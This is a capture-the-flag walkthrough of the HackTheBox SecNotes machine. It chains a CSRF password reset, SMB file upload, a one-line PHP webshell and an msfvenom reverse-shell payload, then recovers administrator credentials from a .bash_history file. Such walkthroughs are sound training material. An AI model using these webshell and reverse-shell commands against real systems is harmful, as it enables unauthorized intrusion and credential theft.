A medium Windows box from HackTheBox, get initial access by resetting the password of another user on a site with CSRF, then get creds by logging in as them that allow you to get a reverse shell and escalate to administrator by finding creds in an instance of bash for windows.


Starting with a default nmap scan

sudo nmap -sC -sV -Pn nmap/init
80/tcp  open  http         Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-title: Secure Notes - Login
|_Requested resource was login.php
| http-methods: 
|_  Potentially risky methods: TRACE
445/tcp open  microsoft-ds Windows 10 Enterprise 17134 microsoft-ds (workgroup: HTB)
Service Info: Host: SECNOTES; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2022-09-25T16:50:24
|_  start_date: N/A
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb-os-discovery: 
|   OS: Windows 10 Enterprise 17134 (Windows 10 Enterprise 6.3)
|   OS CPE: cpe:/o:microsoft:windows_10::-
|   Computer name: SECNOTES
|   NetBIOS computer name: SECNOTES\x00
|   Workgroup: HTB\x00
|_  System time: 2022-09-25T09:50:27-07:00
|_clock-skew: mean: 2h20m02s, deviation: 4h02m31s, median: 1s

Only two ports open so navigate to the site

See a login page, dont get any easy SQLi payloads work, so create an account and log in

It seems to be a note taking app

Get a user and domain with user “tyler” and domain “secnotes.htb”, so add that domain to the /etc/hosts file

Now try playing around with the site to see what we can find, and find a XXS when you create a note, but it doesn’t really seem useful since theres no way to make someone navigate to it

The focus on the contact form in the header makes me think that it could be a CSRF vulnerability, and try to test it out on the site with a simple payload of

Start a netcat listener on port 80 and send the payload to see if it will pop

And it does

nc -lnvp 80              
listening on [any] 80 ...
connect to [] from (UNKNOWN) [] 56002
GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.228
Connection: Keep-Alive


Now need to do something malicious with this knowledge, maybe we can reset the “tyler” users password?

Notice that the reset password functionality doesn’t require the current password

So its a prime target

Catching the request in burp, see that its a post request - try to check if it can still be changed if its sent as a get request for simplicity

If it can only be sent as a post we’ll have to include some javascript to submit the form

To convert the request, send the captured password change request to repeater, then right click and select “Change HTTP method”, and burp will convert the POST request to GET

Sending the new GET request, it still resets the password

In the end, the URL for the password reset request is

And send it in the contact form

Wait a minute or two, then try to login as tyler with password “password” and get in to read his notes

The note on the bottom contains what looks like SMB creds, so go to connect to that with smbclient


smbclient \\\\secnotes.htb\\new-site --user=tyler

Then login with the password - but dont see anything too interesting, just the default contents of an IIS site

smb: \> ls
  .                                   D        0  Sun Sep 25 14:50:33 2022
  ..                                  D        0  Sun Sep 25 14:50:33 2022
  iisstart.htm                        A      696  Thu Jun 21 11:26:03 2018
  iisstart.png                        A    98757  Thu Jun 21 11:26:03 2018
  test.html                           A       74  Sun Sep 25 14:50:33 2022

                7736063 blocks of size 4096. 3332421 blocks available
smb: \> 

Trying to navigate on the secnotes site to /iistart.htm dont see anything, so maybe we are missing something

sudo nmap -p- -T4 -v secnotes.htb

Find another open port, 8808

Discovered open port 8808/tcp on

Navigating to it in the browser, see an IIS homepage - to test if its the same one that we have in SMB upload a test.txt file to the SMB server with the contents “test”, then navigate to it at

And see it displayed on the site

Now to see if we can get an ASP webshell going, but neither ASP nor ASPX work

Intead try a PHP webshell since maybe its the same configuration as the secnotes.htb site

<?php system($_GET['cmd']); ?>

Upload it as web.php, and try the url

And see in the source

So know we have code execution and can simply upload an exe reverse shell and execute it with the webshell

msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=9001 -f exe > rev.exe

Start a listener on 9001, and upload the rev.exe file using the put command on the SMB server

Then navigate to

And catch the reverse shell as tyler




In tylers desktop while submitting the user.txt file, also find a bash.lnk file, a desktop shortcute to bash?

 Directory of C:\Users\tyler\Desktop

09/25/2022  12:50 PM    <DIR>          .
09/25/2022  12:50 PM    <DIR>          ..
06/22/2018  03:09 AM             1,293 bash.lnk
08/02/2021  03:32 AM             1,210 Command Prompt.lnk
04/11/2018  04:34 PM               407 File Explorer.lnk
09/25/2022  12:50 PM    <DIR>          Microsoft
06/21/2018  05:50 PM             1,417 Microsoft Edge.lnk
06/21/2018  09:17 AM             1,110 Notepad++.lnk
09/25/2022  09:33 AM                34 user.txt
08/19/2018  10:59 AM             2,494 Windows PowerShell.lnk
               7 File(s)          7,965 bytes
               3 Dir(s)  13,628,198,912 bytes free

Seems like he installed bash for windows, trying to execute it with


The file isn’t found, so have to go looking for it with

C:\Users\tyler\Desktop>where /R c:\ bash.exe
where /R c:\ bash.exe

Execute it with

C:\Users\tyler\Desktop> c:\Windows\WinSxS\amd64_microsoft-windows-lxss-bash_31bf3856ad364e35_10.0.17134.1_none_251beae725bc7de5\bash.exe

And drop into a bash shell



However when we try to access the C:\Users\Administrator folder, dont have read access

Instead, poke around the bash environment, and find a .bash_history file

cat .bash_history

cd /mnt/c/
cd Users/
cd /
cd ~
mkdir filesystem
mount //$ filesystem/
sudo apt install cifs-utils
mount //$ filesystem/
mount //$ filesystem/ -o user=administrator
cat /proc/filesystems
sudo modprobe cifs
apt install smbclient
smbclient -U 'administrator%u6!4ZwgwOM#^OBf#Nwnh' \\\\\\c$
> .bash_history
less .bash_history

And see some administrator creds!

Back on the Kali machine, try to connect using the creds found in the file, and get a connection as the Administrator user to extract root.txt